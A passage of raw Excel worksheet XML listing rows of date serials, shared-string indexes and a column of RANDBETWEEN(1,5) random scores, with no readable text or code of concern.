    <row r="11837" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A11837" s="1">
        <v>43312.327997685185</v>
      </c>
      <c r="C11837" t="s">
        <v>29</v>
      </c>
      <c r="D11837" t="s">
        <v>86</v>
      </c>
      <c r="E11837" s="2" t="s">
        <v>10613</v>
      </c>
      <c r="F11837">
        <f t="shared" ca="1" si="184"/>
        <v>3</v>
      </c>
    </row>
    <row r="11838" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11838" s="1">
        <v>43312.326331018521</v>
      </c>
      <c r="C11838" t="s">
        <v>885</v>
      </c>
      <c r="D11838" t="s">
        <v>1036</v>
      </c>
      <c r="E11838" s="2" t="s">
        <v>10614</v>
      </c>
      <c r="F11838">
        <f t="shared" ca="1" si="184"/>
        <v>4</v>
      </c>
    </row>
    <row r="11839" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A11839" s="1">
        <v>43312.303298611114</v>
      </c>
      <c r="C11839" t="s">
        <v>430</v>
      </c>
      <c r="E11839" s="2" t="s">
        <v>10615</v>
      </c>
      <c r="F11839">
        <f t="shared" ca="1" si="184"/>
        <v>4</v>
      </c>
    </row>
    <row r="11840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11840" s="1">
        <v>43312.269525462965</v>
      </c>
      <c r="C11840" t="s">
        <v>314</v>
      </c>
      <c r="E11840" t="s">
        <v>10616</v>
      </c>
      <c r="F11840">
        <f t="shared" ca="1" si="184"/>
        <v>1</v>
      </c>
    </row>
    <row r="11841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11841" s="1">
        <v>43312.257233796299</v>
      </c>
      <c r="C11841" t="s">
        <v>3106</v>
      </c>
      <c r="D11841" t="s">
        <v>94</v>
      </c>
      <c r="E11841" t="s">
        <v>10617</v>
      </c>
      <c r="F11841">
        <f t="shared" ca="1" si="184"/>
        <v>1</v>
      </c>
    </row>
    <row r="11842" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A11842" s="1">
        <v>43312.219340277778</v>
      </c>
      <c r="C11842" t="s">
        <v>71</v>
      </c>
      <c r="E11842" s="2" t="s">
        <v>10618</v>
      </c>
      <c r="F11842">
        <f t="shared" ref="F11842:F11905" ca="1" si="185">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="11843" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11843" s="1">
        <v>43312.213865740741</v>
      </c>
      <c r="C11843" t="s">
        <v>1992</v>
      </c>
      <c r="D11843" t="s">
        <v>89</v>
      </c>
      <c r="E11843" s="2" t="s">
        <v>10619</v>
      </c>
      <c r="F11843">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11844" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11844" s="1">
        <v>43312.179745370369</v>
      </c>
      <c r="C11844" t="s">
        <v>2192</v>
      </c>
      <c r="D11844" t="s">
        <v>7</v>
      </c>
      <c r="E11844" s="2" t="s">
        <v>10620</v>
      </c>
      <c r="F11844">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11845" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11845" s="1">
        <v>43312.159918981481</v>
      </c>
      <c r="C11845" t="s">
        <v>144</v>
      </c>
      <c r="D11845" t="s">
        <v>46</v>
      </c>
      <c r="E11845" s="2" t="s">
        <v>10621</v>
      </c>
      <c r="F11845">
        <f t="shared" ca="1" si="185"/>
        <v>2</v>
      </c>
    </row>
    <row r="11846" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A11846" s="1">
        <v>43312.122175925928</v>
      </c>
      <c r="C11846" t="s">
        <v>43</v>
      </c>
      <c r="D11846" t="s">
        <v>89</v>
      </c>
      <c r="E11846" s="2" t="s">
        <v>10622</v>
      </c>
      <c r="F11846">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11847" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11847" s="1">
        <v>43312.110127314816</v>
      </c>
      <c r="C11847" t="s">
        <v>10623</v>
      </c>
      <c r="D11847" t="s">
        <v>367</v>
      </c>
      <c r="E11847" s="2" t="s">
        <v>10624</v>
      </c>
      <c r="F11847">
        <f t="shared" ca="1" si="185"/>
        <v>2</v>
      </c>
    </row>
    <row r="11848" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11848" s="1">
        <v>43312.090231481481</v>
      </c>
      <c r="C11848" t="s">
        <v>140</v>
      </c>
      <c r="D11848" t="s">
        <v>234</v>
      </c>
      <c r="E11848" t="s">
        <v>10625</v>
      </c>
      <c r="F11848">
        <f t="shared" ca="1" si="185"/>
        <v>2</v>
      </c>
    </row>
    <row r="11849" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11849" s="1">
        <v>43312.079652777778</v>
      </c>
      <c r="C11849" t="s">
        <v>10085</v>
      </c>
      <c r="D11849" t="s">
        <v>1036</v>
      </c>
      <c r="E11849" s="2" t="s">
        <v>10626</v>
      </c>
      <c r="F11849">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11850" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A11850" s="1">
        <v>43312.071493055555</v>
      </c>
      <c r="C11850" t="s">
        <v>140</v>
      </c>
      <c r="D11850" t="s">
        <v>234</v>
      </c>
      <c r="E11850" s="2" t="s">
        <v>10627</v>
      </c>
      <c r="F11850">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11851" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11851" s="1">
        <v>43312.069456018522</v>
      </c>
      <c r="C11851" t="s">
        <v>3150</v>
      </c>
      <c r="D11851" t="s">
        <v>56</v>
      </c>
      <c r="E11851" s="2" t="s">
        <v>10628</v>
      </c>
      <c r="F11851">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11852" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A11852" s="1">
        <v>43312.040023148147</v>
      </c>
      <c r="C11852" t="s">
        <v>140</v>
      </c>
      <c r="D11852" t="s">
        <v>141</v>
      </c>
      <c r="E11852" s="2" t="s">
        <v>10629</v>
      </c>
      <c r="F11852">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11853" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11853" s="1">
        <v>43312.013368055559</v>
      </c>
      <c r="C11853" t="s">
        <v>2082</v>
      </c>
      <c r="D11853" t="s">
        <v>17</v>
      </c>
      <c r="E11853" s="2" t="s">
        <v>10630</v>
      </c>
      <c r="F11853">
        <f t="shared" ca="1" si="185"/>
        <v>4</v>
      </c>
    </row>
    <row r="11854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11854" s="1">
        <v>43311.999467592592</v>
      </c>
      <c r="C11854" t="s">
        <v>743</v>
      </c>
      <c r="D11854" t="s">
        <v>713</v>
      </c>
      <c r="E11854" t="s">
        <v>10631</v>
      </c>
      <c r="F11854">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11855" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11855" s="1">
        <v>43311.981724537036</v>
      </c>
      <c r="C11855" t="s">
        <v>220</v>
      </c>
      <c r="D11855" t="s">
        <v>993</v>
      </c>
      <c r="E11855" s="2" t="s">
        <v>10632</v>
      </c>
      <c r="F11855">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11856" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11856" s="1">
        <v>43311.972534722219</v>
      </c>
      <c r="C11856" t="s">
        <v>41</v>
      </c>
      <c r="E11856" t="s">
        <v>10633</v>
      </c>
      <c r="F11856">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11857" s="1">
        <v>43311.952152777776</v>
      </c>
      <c r="C11857" t="s">
        <v>10</v>
      </c>
      <c r="D11857" t="s">
        <v>52</v>
      </c>
      <c r="E11857" t="s">
        <v>10634</v>
      </c>
      <c r="F11857">
        <f t="shared" ca="1" si="185"/>
        <v>2</v>
      </c>
    </row>
    <row r="11858" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A11858" s="1">
        <v>43311.951157407406</v>
      </c>
      <c r="C11858" t="s">
        <v>10</v>
      </c>
      <c r="D11858" t="s">
        <v>158</v>
      </c>
      <c r="E11858" s="2" t="s">
        <v>10635</v>
      </c>
      <c r="F11858">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11859" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11859" s="1">
        <v>43311.922418981485</v>
      </c>
      <c r="C11859" t="s">
        <v>1325</v>
      </c>
      <c r="D11859" t="s">
        <v>381</v>
      </c>
      <c r="E11859" s="2" t="s">
        <v>10636</v>
      </c>
      <c r="F11859">
        <f t="shared" ca="1" si="185"/>
        <v>2</v>
      </c>
    </row>
    <row r="11860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11860" s="1">
        <v>43311.919398148151</v>
      </c>
      <c r="C11860" t="s">
        <v>139</v>
      </c>
      <c r="E11860" t="s">
        <v>10637</v>
      </c>
      <c r="F11860">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11861" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11861" s="1">
        <v>43311.895787037036</v>
      </c>
      <c r="C11861" t="s">
        <v>9064</v>
      </c>
      <c r="D11861" t="s">
        <v>993</v>
      </c>
      <c r="E11861" s="2" t="s">
        <v>10638</v>
      </c>
      <c r="F11861">
        <f t="shared" ca="1" si="185"/>
        <v>4</v>
      </c>
    </row>
    <row r="11862" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11862" s="1">
        <v>43311.878796296296</v>
      </c>
      <c r="C11862" t="s">
        <v>140</v>
      </c>
      <c r="D11862" t="s">
        <v>234</v>
      </c>
      <c r="E11862" s="2" t="s">
        <v>10639</v>
      </c>
      <c r="F11862">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11863" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11863" s="1">
        <v>43311.835902777777</v>
      </c>
      <c r="C11863" t="s">
        <v>3097</v>
      </c>
      <c r="D11863" t="s">
        <v>721</v>
      </c>
      <c r="E11863" s="2" t="s">
        <v>10640</v>
      </c>
      <c r="F11863">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11864" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A11864" s="1">
        <v>43311.823888888888</v>
      </c>
      <c r="C11864" t="s">
        <v>43</v>
      </c>
      <c r="D11864" t="s">
        <v>41</v>
      </c>
      <c r="E11864" s="2" t="s">
        <v>10641</v>
      </c>
      <c r="F11864">
        <f t="shared" ca="1" si="185"/>
        <v>2</v>
      </c>
    </row>
    <row r="11865" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11865" s="1">
        <v>43311.817152777781</v>
      </c>
      <c r="C11865" t="s">
        <v>1080</v>
      </c>
      <c r="D11865" t="s">
        <v>1993</v>
      </c>
      <c r="E11865" s="2" t="s">
        <v>10642</v>
      </c>
      <c r="F11865">
        <f t="shared" ca="1" si="185"/>
        <v>4</v>
      </c>
    </row>
    <row r="11866" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A11866" s="1">
        <v>43311.798206018517</v>
      </c>
      <c r="C11866" t="s">
        <v>10</v>
      </c>
      <c r="D11866" t="s">
        <v>89</v>
      </c>
      <c r="E11866" s="2" t="s">
        <v>10643</v>
      </c>
      <c r="F11866">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11867" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11867" s="1">
        <v>43311.756724537037</v>
      </c>
      <c r="C11867" t="s">
        <v>10644</v>
      </c>
      <c r="D11867" t="s">
        <v>713</v>
      </c>
      <c r="E11867" s="2" t="s">
        <v>10645</v>
      </c>
      <c r="F11867">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11868" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11868" s="1">
        <v>43311.741296296299</v>
      </c>
      <c r="C11868" t="s">
        <v>197</v>
      </c>
      <c r="D11868" t="s">
        <v>821</v>
      </c>
      <c r="E11868" s="2" t="s">
        <v>10646</v>
      </c>
      <c r="F11868">
        <f t="shared" ca="1" si="185"/>
        <v>4</v>
      </c>
    </row>
    <row r="11869" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11869" s="1">
        <v>43311.721331018518</v>
      </c>
      <c r="C11869" t="s">
        <v>16</v>
      </c>
      <c r="E11869" s="2" t="s">
        <v>10647</v>
      </c>
      <c r="F11869">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11870" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A11870" s="1">
        <v>43311.701979166668</v>
      </c>
      <c r="C11870" t="s">
        <v>10</v>
      </c>
      <c r="D11870" t="s">
        <v>290</v>
      </c>
      <c r="E11870" s="2" t="s">
        <v>10648</v>
      </c>
      <c r="F11870">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11871" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11871" s="1">
        <v>43311.700439814813</v>
      </c>
      <c r="C11871" t="s">
        <v>10</v>
      </c>
      <c r="D11871" t="s">
        <v>36</v>
      </c>
      <c r="E11871" s="2" t="s">
        <v>10649</v>
      </c>
      <c r="F11871">
        <f t="shared" ca="1" si="185"/>
        <v>4</v>
      </c>
    </row>
    <row r="11872" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11872" s="1">
        <v>43311.697638888887</v>
      </c>
      <c r="C11872" t="s">
        <v>107</v>
      </c>
      <c r="E11872" s="2" t="s">
        <v>10650</v>
      </c>
      <c r="F11872">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11873" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11873" s="1">
        <v>43311.684351851851</v>
      </c>
      <c r="C11873" t="s">
        <v>5239</v>
      </c>
      <c r="D11873" t="s">
        <v>41</v>
      </c>
      <c r="E11873" s="2" t="s">
        <v>10651</v>
      </c>
      <c r="F11873">
        <f t="shared" ca="1" si="185"/>
        <v>4</v>
      </c>
    </row>
    <row r="11874" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11874" s="1">
        <v>43311.672847222224</v>
      </c>
      <c r="C11874" t="s">
        <v>3994</v>
      </c>
      <c r="D11874" t="s">
        <v>94</v>
      </c>
      <c r="E11874" s="2" t="s">
        <v>10652</v>
      </c>
      <c r="F11874">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11875" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11875" s="1">
        <v>43311.67224537037</v>
      </c>
      <c r="C11875" t="s">
        <v>6</v>
      </c>
      <c r="D11875" t="s">
        <v>25</v>
      </c>
      <c r="E11875" t="s">
        <v>10653</v>
      </c>
      <c r="F11875">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11876" s="1">
        <v>43311.660497685189</v>
      </c>
      <c r="C11876" t="s">
        <v>10</v>
      </c>
      <c r="D11876" t="s">
        <v>36</v>
      </c>
      <c r="E11876" t="s">
        <v>10654</v>
      </c>
      <c r="F11876">
        <f t="shared" ca="1" si="185"/>
        <v>4</v>
      </c>
    </row>
    <row r="11877" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A11877" s="1">
        <v>43311.660115740742</v>
      </c>
      <c r="C11877" t="s">
        <v>10</v>
      </c>
      <c r="D11877" t="s">
        <v>290</v>
      </c>
      <c r="E11877" s="2" t="s">
        <v>10655</v>
      </c>
      <c r="F11877">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11878" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11878" s="1">
        <v>43311.659872685188</v>
      </c>
      <c r="C11878" t="s">
        <v>10</v>
      </c>
      <c r="D11878" t="s">
        <v>6</v>
      </c>
      <c r="E11878" t="s">
        <v>10656</v>
      </c>
      <c r="F11878">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11879" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11879" s="1">
        <v>43311.651006944441</v>
      </c>
      <c r="C11879" t="s">
        <v>6829</v>
      </c>
      <c r="E11879" s="2" t="s">
        <v>10657</v>
      </c>
      <c r="F11879">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11880" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11880" s="1">
        <v>43311.630601851852</v>
      </c>
      <c r="C11880" t="s">
        <v>10</v>
      </c>
      <c r="D11880" t="s">
        <v>6</v>
      </c>
      <c r="E11880" s="2" t="s">
        <v>10658</v>
      </c>
      <c r="F11880">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11881" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11881" s="1">
        <v>43311.620127314818</v>
      </c>
      <c r="C11881" t="s">
        <v>2192</v>
      </c>
      <c r="D11881" t="s">
        <v>290</v>
      </c>
      <c r="E11881" s="2" t="s">
        <v>10659</v>
      </c>
      <c r="F11881">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11882" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A11882" s="1">
        <v>43311.611018518517</v>
      </c>
      <c r="C11882" t="s">
        <v>6</v>
      </c>
      <c r="D11882" t="s">
        <v>25</v>
      </c>
      <c r="E11882" s="2" t="s">
        <v>10660</v>
      </c>
      <c r="F11882">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11883" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11883" s="1">
        <v>43311.607685185183</v>
      </c>
      <c r="C11883" t="s">
        <v>9633</v>
      </c>
      <c r="D11883" t="s">
        <v>229</v>
      </c>
      <c r="E11883" s="2" t="s">
        <v>10661</v>
      </c>
      <c r="F11883">
        <f t="shared" ca="1" si="185"/>
        <v>4</v>
      </c>
    </row>
    <row r="11884" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A11884" s="1">
        <v>43311.598020833335</v>
      </c>
      <c r="C11884" t="s">
        <v>154</v>
      </c>
      <c r="D11884" t="s">
        <v>192</v>
      </c>
      <c r="E11884" s="2" t="s">
        <v>10662</v>
      </c>
      <c r="F11884">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11885" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A11885" s="1">
        <v>43311.595983796295</v>
      </c>
      <c r="C11885" t="s">
        <v>103</v>
      </c>
      <c r="D11885" t="s">
        <v>721</v>
      </c>
      <c r="E11885" s="2" t="s">
        <v>10663</v>
      </c>
      <c r="F11885">
        <f t="shared" ca="1" si="185"/>
        <v>2</v>
      </c>
    </row>
    <row r="11886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11886" s="1">
        <v>43311.590196759258</v>
      </c>
      <c r="C11886" t="s">
        <v>10</v>
      </c>
      <c r="D11886" t="s">
        <v>6</v>
      </c>
      <c r="E11886" t="s">
        <v>10664</v>
      </c>
      <c r="F11886">
        <f t="shared" ca="1" si="185"/>
        <v>2</v>
      </c>
    </row>
    <row r="11887" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11887" s="1">
        <v>43311.55672453704</v>
      </c>
      <c r="C11887" t="s">
        <v>5361</v>
      </c>
      <c r="D11887" t="s">
        <v>2139</v>
      </c>
      <c r="E11887" s="2" t="s">
        <v>10665</v>
      </c>
      <c r="F11887">
        <f t="shared" ca="1" si="185"/>
        <v>2</v>
      </c>
    </row>
    <row r="11888" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A11888" s="1">
        <v>43311.554166666669</v>
      </c>
      <c r="C11888" t="s">
        <v>6</v>
      </c>
      <c r="D11888" t="s">
        <v>114</v>
      </c>
      <c r="E11888" s="2" t="s">
        <v>10666</v>
      </c>
      <c r="F11888">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11889" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A11889" s="1">
        <v>43311.55096064815</v>
      </c>
      <c r="C11889" t="s">
        <v>65</v>
      </c>
      <c r="E11889" s="2" t="s">
        <v>10667</v>
      </c>
      <c r="F11889">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11890" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11890" s="1">
        <v>43311.544259259259</v>
      </c>
      <c r="C11890" t="s">
        <v>243</v>
      </c>
      <c r="D11890" t="s">
        <v>151</v>
      </c>
      <c r="E11890" s="2" t="s">
        <v>10668</v>
      </c>
      <c r="F11890">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11891" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A11891" s="1">
        <v>43311.505810185183</v>
      </c>
      <c r="C11891" t="s">
        <v>6</v>
      </c>
      <c r="D11891" t="s">
        <v>25</v>
      </c>
      <c r="E11891" s="2" t="s">
        <v>10669</v>
      </c>
      <c r="F11891">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11892" s="1">
        <v>43311.502557870372</v>
      </c>
      <c r="C11892" t="s">
        <v>10</v>
      </c>
      <c r="D11892" t="s">
        <v>39</v>
      </c>
      <c r="E11892" t="s">
        <v>10670</v>
      </c>
      <c r="F11892">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11893" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11893" s="1">
        <v>43311.495613425926</v>
      </c>
      <c r="C11893" t="s">
        <v>8808</v>
      </c>
      <c r="D11893" t="s">
        <v>1036</v>
      </c>
      <c r="E11893" s="2" t="s">
        <v>10671</v>
      </c>
      <c r="F11893">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11894" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A11894" s="1">
        <v>43311.493472222224</v>
      </c>
      <c r="C11894" t="s">
        <v>10</v>
      </c>
      <c r="D11894" t="s">
        <v>23</v>
      </c>
      <c r="E11894" s="2" t="s">
        <v>10672</v>
      </c>
      <c r="F11894">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11895" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11895" s="1">
        <v>43311.489201388889</v>
      </c>
      <c r="C11895" t="s">
        <v>2192</v>
      </c>
      <c r="D11895" t="s">
        <v>7</v>
      </c>
      <c r="E11895" s="2" t="s">
        <v>10673</v>
      </c>
      <c r="F11895">
        <f t="shared" ca="1" si="185"/>
        <v>2</v>
      </c>
    </row>
    <row r="11896" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A11896" s="1">
        <v>43311.488055555557</v>
      </c>
      <c r="C11896" t="s">
        <v>586</v>
      </c>
      <c r="D11896" t="s">
        <v>158</v>
      </c>
      <c r="E11896" s="2" t="s">
        <v>10674</v>
      </c>
      <c r="F11896">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11897" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11897" s="1">
        <v>43311.483356481483</v>
      </c>
      <c r="C11897" t="s">
        <v>333</v>
      </c>
      <c r="D11897" t="s">
        <v>94</v>
      </c>
      <c r="E11897" s="2" t="s">
        <v>10675</v>
      </c>
      <c r="F11897">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11898" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11898" s="1">
        <v>43311.465532407405</v>
      </c>
      <c r="C11898" t="s">
        <v>48</v>
      </c>
      <c r="E11898" t="s">
        <v>10676</v>
      </c>
      <c r="F11898">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11899" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11899" s="1">
        <v>43311.461747685185</v>
      </c>
      <c r="C11899" t="s">
        <v>127</v>
      </c>
      <c r="D11899" t="s">
        <v>222</v>
      </c>
      <c r="E11899" t="s">
        <v>9877</v>
      </c>
      <c r="F11899">
        <f t="shared" ca="1" si="185"/>
        <v>2</v>
      </c>
    </row>
    <row r="11900" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A11900" s="1">
        <v>43311.455277777779</v>
      </c>
      <c r="C11900" t="s">
        <v>29</v>
      </c>
      <c r="D11900" t="s">
        <v>602</v>
      </c>
      <c r="E11900" s="2" t="s">
        <v>10677</v>
      </c>
      <c r="F11900">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11901" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A11901" s="1">
        <v>43311.454513888886</v>
      </c>
      <c r="C11901" t="s">
        <v>10</v>
      </c>
      <c r="D11901" t="s">
        <v>192</v>
      </c>
      <c r="E11901" s="2" t="s">
        <v>10678</v>
      </c>
      <c r="F11901">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11902" s="1">
        <v>43311.451909722222</v>
      </c>
      <c r="C11902" t="s">
        <v>222</v>
      </c>
      <c r="E11902" t="s">
        <v>10679</v>
      </c>
      <c r="F11902">
        <f t="shared" ca="1" si="185"/>
        <v>4</v>
      </c>
    </row>
    <row r="11903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11903" s="1">
        <v>43311.446956018517</v>
      </c>
      <c r="C11903" t="s">
        <v>10</v>
      </c>
      <c r="D11903" t="s">
        <v>178</v>
      </c>
      <c r="E11903" t="s">
        <v>10680</v>
      </c>
      <c r="F11903">
        <f t="shared" ca="1" si="185"/>
        <v>1</v>
      </c>
    </row>
    <row r="11904" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11904" s="1">
        <v>43311.43440972222</v>
      </c>
      <c r="C11904" t="s">
        <v>65</v>
      </c>
      <c r="D11904" t="s">
        <v>82</v>
      </c>
      <c r="E11904" s="2" t="s">
        <v>10681</v>
      </c>
      <c r="F11904">
        <f t="shared" ca="1" si="185"/>
        <v>5</v>
      </c>
    </row>
    <row r="11905" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A11905" s="1">
        <v>43311.422800925924</v>
      </c>
      <c r="C11905" t="s">
        <v>3994</v>
      </c>
      <c r="D11905" t="s">
        <v>46</v>
      </c>
      <c r="E11905" s="2" t="s">
        <v>10682</v>
      </c>
      <c r="F11905">
        <f t="shared" ca="1" si="185"/>
        <v>3</v>
      </c>
    </row>
    <row r="11906" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11906" s="1">
        <v>43311.407708333332</v>
      </c>
      <c r="C11906" t="s">
        <v>10</v>
      </c>
      <c r="E11906" t="s">
        <v>10683</v>
      </c>
      <c r="F11906">
        <f t="shared" ref="F11906:F11969" ca="1" si="186">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="11907" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A11907" s="1">
        <v>43311.404583333337</v>
      </c>
      <c r="C11907" t="s">
        <v>29</v>
      </c>
      <c r="D11907" t="s">
        <v>124</v>
      </c>
      <c r="E11907" s="2" t="s">
        <v>10684</v>
      </c>
      <c r="F11907">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11908" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A11908" s="1">
        <v>43311.397766203707</v>
      </c>
      <c r="C11908" t="s">
        <v>48</v>
      </c>
      <c r="E11908" s="2" t="s">
        <v>10685</v>
      </c>
      <c r="F11908">
        <f t="shared" ca="1" si="186"/>
        <v>3</v>
      </c>
    </row>
    <row r="11909" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11909" s="1">
        <v>43311.394074074073</v>
      </c>
      <c r="C11909" t="s">
        <v>10</v>
      </c>
      <c r="D11909" t="s">
        <v>163</v>
      </c>
      <c r="E11909" t="s">
        <v>10686</v>
      </c>
      <c r="F11909">
        <f t="shared" ca="1" si="186"/>
        <v>3</v>
      </c>
    </row>
    <row r="11910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11910" s="1">
        <v>43311.388773148145</v>
      </c>
      <c r="C11910" t="s">
        <v>10</v>
      </c>
      <c r="D11910" t="s">
        <v>23</v>
      </c>
      <c r="E11910" t="s">
        <v>10687</v>
      </c>
      <c r="F11910">
        <f t="shared" ca="1" si="186"/>
        <v>1</v>
      </c>
    </row>
    <row r="11911" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A11911" s="1">
        <v>43311.387418981481</v>
